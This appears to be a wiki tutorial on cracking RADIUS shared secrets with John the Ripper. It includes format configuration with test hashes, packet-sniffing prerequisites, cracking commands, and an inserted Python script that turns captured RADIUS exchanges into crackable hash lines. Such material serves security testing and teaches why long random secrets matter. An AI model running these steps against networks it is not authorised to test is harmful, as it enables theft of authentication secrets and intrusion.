Using John to crack RADIUS shared secrets

The RADIUS protocol uses a shared secret between each client and the RADIUS server for two purposes: hiding user passwords in the User-Password attribute and authenticating the RADIUS server's replies. Both constructions are based on MD5 with a salt.

The attached Perl script implements two attacks discussed in An Analysis of the RADIUS Authentication Protocol, by Joshua Hill.

To use this script, you will need john-1.7.9 with all the patches up to 0043-dynamic-salt-rewrite.

john needs to be configured so that dynamic_1008 implements md5($p.$s) and dynamic_1009 implements md5($s.$p). Below are the changes to make to dynamic.conf to implement these formats:

####################################################################
# Dynamic type for algorithm used in RADIUS User-Password attribute md5($p.$s)
####################################################################
[List.Generic:dynamic_1008]
# expression shown will be this string:
Expression=md5($p.$s) [RADIUS User-Password]
# Flag needed here, is Salt
Flag=MGF_SALTED
# The salt has a fixed length of 16 bytes
Saltlen=16
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_keys
Func=DynamicFunc__append_salt
Func=DynamicFunc__crypt
Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret
Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret
######################################################################
# Dynamic Type for algorithm used in RADIUS Responses md5($s.$p)
######################################################################
[List.Generic:dynamic_1009]
Expression=md5($s.$p) [RADIUS Responses]
Flag=MGF_SALTED
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_salt
Func=DynamicFunc__append_keys
Func=DynamicFunc__crypt
Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1

You will need to:

  1. either be able to try authentications with a specific login and password, and sniff the Access-Request packets
  2. or sniff Access-Request and corresponding Access-Reply packets

Once you have the packet capture files, edit the Perl script source to tell it which login(s) you used in case 1, then launch the script with the capture file(s) as arguments and redirect its output to a file:

perl rad2john.pl capture1.cap capture2.cap ... >radius.john

It extracts the relevant information from the capture files and dumps it in dynamic_1008 or dynamic_1009 format, depending on whether the login found is one of the known ones. By default it dumps only one line per client machine seen, but this is also configurable (see the Perl script file).
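To make the two target hashes concrete, the following Python code (an added example, not the wiki's Perl script) reproduces the RFC 2865 User-Password hiding and Response Authenticator constructions, then shows how a captured attribute plus a known password yields a dynamic_1008 line and how a sniffed reply yields a dynamic_1009 line. The sample secret, password and Request Authenticator are constructed values; the $HEX$ salt encoding follows the test vectors above, and using it for the dynamic_1009 salt is an assumption.

```python
import hashlib

def _pad16(data: bytes) -> bytes:
    """Zero-pad to a multiple of 16 bytes (RFC 2865 5.2); an empty password still fills one block."""
    return data + b"\x00" * ((16 - len(data) % 16) % 16 if data else 16)

def hide_user_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: block i of the hidden attribute is P_i XOR MD5(secret + c_(i-1)),
    with c_0 = the 16-byte Request Authenticator. That first MD5 is md5($p.$s)."""
    out, prev, padded = b"", request_auth, _pad16(password)
    for i in range(0, len(padded), 16):
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block
    return out

def unhide_user_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_user_password, as the RADIUS server performs it."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")

def md5_p_s(secret: bytes, request_auth: bytes) -> str:
    """The dynamic_1008 target: md5($p.$s) with $p = shared secret, $s = Request Authenticator."""
    return hashlib.md5(secret + request_auth).hexdigest()

def dynamic_1008_line(hidden: bytes, request_auth: bytes, known_password: bytes) -> str:
    """Attack 1: with the user's password known, XORing it back out of the captured
    attribute exposes MD5(secret + RA) without the secret; written as hash$HEX$salt."""
    keystream = bytes(x ^ y for x, y in zip(hidden[:16], _pad16(known_password)[:16]))
    return "$dynamic_1008$%s$HEX$%s" % (keystream.hex(), request_auth.hex())

def _resp_salt(code: int, ident: int, attrs: bytes, request_auth: bytes) -> bytes:
    """Code + ID + Length (20-byte header + attributes) + RequestAuth + Attributes: the $s of md5($s.$p)."""
    return bytes([code, ident]) + (20 + len(attrs)).to_bytes(2, "big") + request_auth + attrs

def response_authenticator(code: int, ident: int, attrs: bytes, request_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(_resp_salt(code, ident, attrs, request_auth) + secret).digest()

def dynamic_1009_line(code: int, ident: int, attrs: bytes, request_auth: bytes, resp_auth: bytes) -> str:
    """Attack 2: a sniffed reply and its request give md5($s.$p) with no password needed
    ($HEX$ salt encoding for the packet prefix is an assumption)."""
    return "$dynamic_1009$%s$HEX$%s" % (resp_auth.hex(), _resp_salt(code, ident, attrs, request_auth).hex())

if __name__ == "__main__":
    secret, pw, ra = b"secret", b"hunter2", bytes(range(16))   # constructed sample values
    hidden = hide_user_password(pw, secret, ra)
    print(dynamic_1008_line(hidden, ra, pw))
    print(dynamic_1009_line(2, 7, b"\x12\x06\x00\x00\x00\x05", ra, response_authenticator(2, 7, b"\x12\x06\x00\x00\x00\x05", ra, secret)))
```

Because one captured exchange fixes the salt and the plaintext structure entirely, the shared secret is the only unknown left for an offline guess, which is why long random secrets (not dictionary words) are the relevant mitigation.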

You can then launch john with the result file, using

john --format=dynamic_1008 radius.john

or

john --format=dynamic_1009 radius.john

depending on which attack you are interested in. You can of course add options to implement specific brute-force schemes.
